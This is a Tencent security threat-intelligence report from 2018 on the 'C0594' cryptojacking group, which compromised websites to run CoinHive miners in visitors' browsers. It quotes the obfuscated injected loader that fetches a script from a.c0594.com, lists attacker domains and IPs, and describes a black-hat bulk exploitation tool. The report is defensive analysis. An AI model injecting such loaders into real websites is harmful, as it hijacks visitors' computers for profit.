cover_image

C0594黑客组织大肆利用网页挖矿木马牟利,已黑掉数千网站

腾讯安全威胁情报中心 2018年04月09日 09:25

0x1 概述


腾讯御见威胁情报中心监测发现,一个名为“C0594”的挖矿组织已黑掉数千家企业、互联网公司、学校和政府机构网站,被黑网页会嵌入网页挖矿木马。用户浏览器访问这些网站时,浏览器会开启挖矿模式,电脑会迅速变得卡顿。


详细分析发现,该批站点中的核心JS文件被注入恶意代码,通过多次请求不同的脚本文件,最终在网站访客浏览器上运行CoinHive挖矿代码。


受C0594挖矿木马影响的行业分布如下图所示:

图片


C0594网页挖矿木马的工作流程:

图片

与以往直接在网页源码插入CoinHive挖矿代码不同,此次发现的挖矿行为是动态加载JS文件,在不同网页中插入同样的JS恶意代码,并且统计收益的Site Key也相同,可以推测是同一个组织进行的一次有组织的网络攻击。


由于该段挖矿代码来源于a.c0594.com,我们暂且将其称为C0594组织恶意挖矿事件。

图片


注:CoinHive挖矿代码


CoinHive是专门用来挖门罗币的JS引擎,靠一小段嵌入网站的代码挖门罗币,有多家安全公司已经将CoinHive定义为Web用户的最大的安全威胁。


CoinHive的控制者将挖矿代码公布出去,任何入侵者均可以申请一个密钥,将挖矿代码挂在被黑的网站上,为自己牟利。


0x2 威胁等级(中危)


危害评估:★★★☆☆


网站被植入C0594挖矿脚本,表示网站已被入侵。攻击者可以利用被入侵的网站挖矿牟利,也可以用作其他恶意用途。


影响评估:★★★☆☆


C0594挖矿组织是极为活跃的门罗币挖矿组织,大量网站被该组织入侵,网民访问到被入侵的网页时,计算机资源会被用来挖矿。


0x3 影响面


访问到C0594挖矿木马网页的计算机均会受影响。若网站管理员发现自己的网站被提示存在挖矿病毒,可按本文末尾的安全建议进行处理。


0x4 事件分析


以该批站点中的bayimg.co网站为例,分析如下:


从bayimg.co网站源码,可看到JS:jquery.cookie.js被注入了恶意代码:


document.write('<script src=http://a'+'.c059'+'4.com/?e=5></script>')

图片

hxxp://a.c0594.com/?e=5同时会调用hxxp://a.c0594.com/?js=1

图片

从而链接到CoinHive挖矿平台,执行挖矿操作。

图片

挖矿收益最终归属为Coinhive.com


对应Site Key:99nheD84S8eJK7eD4pufvR5Wd1KGjxlj


在whorunscoinhive.com查询该Site Key挖矿的网页月流量达1011442,排在网页挖矿top榜第56位:

图片

0x5 木马溯源


通过搜索引擎,可看到该组织早在2016年就开始对大量网站进行攻击入侵:

图片

图片

使用腾讯御见威胁情报平台对a.c0594.com进行反查,发现该域名曾解析到IP地址:62.210.181.55和47.89.176.191

图片

继续反查这两个IP地址,发现其下存在较多xxx.c0594.com以及xxx.094n.com的域名。

图片

图片

其中域名member.094n.com引起了我们的注意。

图片

该平台提供webshell列表、WordPress漏洞列表、网站注入点管理等功能。在产品更新记录中还可以看到对struct漏洞攻击、SQLMAP注入攻击等的更新记录。

图片

从网站下载最新的软件得到一款名为Black Spider的黑帽辅助软件。

图片

该软件可以批量检测网站的漏洞,提供功能包括:自动爬取Getshell、自动扫描注入点、自动文件探测、旁站C段扫描、漏洞扫描、CMS安全检测、批量检测注入等。

图片

软件的CMS.txt文件记录了支持检测的一百多种建站系统漏洞,包括学校建站系统、企业建站系统、文章管理等建站系统的漏洞。 

图片

针对各类漏洞,Black Spider.exe构造对应的url请求进行检测。

图片

该工具可以检测出此次中招网站的Fck上传等漏洞。不法分子亦可利用此工具,通过后门植入挖矿代码或执行其它恶意动作。

图片

图片

Black Spider工具由Alihack.com开发而成,挖矿木马所在网站a.c0594.com与黑客工具网站member.094n.com的IP信息相吻合,证明两者有十分密切的相关性。

图片

图片

0x6 解决方案


腾讯安全专家建议如下:


1.使用腾讯企业安全“御知”(网址:https://s.tencent.com/product/yuzhi/index.html)进行风险扫描和站点监控,及时修复Web服务器建站系统安全漏洞。


2.网站管理员自查网站源码中是否包含“src=hxxp://a'+'.c059'+'4.com/?e=5”,若有,则表示已被入侵,可删除相关恶意代码。


3.网站管理员可使用腾讯云网站管家智能防护平台,其具备web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统。下载地址:https://cloud.tencent.com/product/waf


4.普通网民可使用腾讯电脑管家拦截含挖矿木马的网页。

图片


0x7 受影响的部分网站

图片


微信扫一扫
关注该公众号

继续滑动看下一个
腾讯安全威胁情报中心
向上滑动看下一个